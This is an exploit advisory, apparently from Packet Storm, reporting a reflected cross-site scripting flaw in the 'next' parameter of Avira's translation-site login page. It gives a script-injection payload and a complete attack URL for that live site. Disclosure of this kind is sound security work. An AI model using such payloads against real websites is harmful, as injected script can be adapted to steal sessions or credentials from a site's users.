translate.avira.com suffers from a cross site scripting vulnerability.
d71d8ff7e41f6aa75bf4b383a4ad84b35a924e19ee1f73dce983f4e1bc088f07# Exploit Title: AVIRA Subdomain XSS Vulnerability
# Google Dork: N/A
# Date: 2016/1/29
# Exploit Author: RootByte
# Vendor Homepage: http://translate.avira.com
# Software Link: N/A
# Version: N/A
# Tested on: Windows 10 / FireFox
# CVE : N/A
~ # Vulnerable Location: http://translate.avira.com/accounts/login/
~ # Variable: next
~ # Using this script for XSS Vunerability Testing :
"><script>prompt(/RootByte/)</script>
~ # Our Finally address is
http://translate.avira.com/accounts/login/?csrfmiddlewaretoken=Ukv77qZZeG2BavIGaHNxcgJ6U4045erd&username=3383976&password=5478964&login=Login&language=ach&next="><script>prompt(/RootByte/)</script>
# Discovered by: RootByte
# Page: https://www.facebook.com/Rootbyte/
# Contact: https://www.facebook.com/groups/RootByte/
InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed